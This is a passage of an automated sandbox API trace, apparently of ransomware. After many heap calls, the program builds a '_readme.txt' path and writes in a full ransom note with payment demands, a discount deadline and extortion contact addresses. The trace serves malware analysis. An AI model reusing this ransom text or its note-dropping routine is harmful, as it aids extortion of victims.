Flags=0x0, Size=0x20) returned 0x2d27680 [0174.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.843] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0174.843] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.843] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.844] PathFindFileNameW (pszPath="") returned="" [0174.844] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.844] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.844] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.844] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.845] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0174.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.845] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0174.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.846] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.847] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.847] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.848] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*" (normalized: "c:\\boot\\ko-kr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, 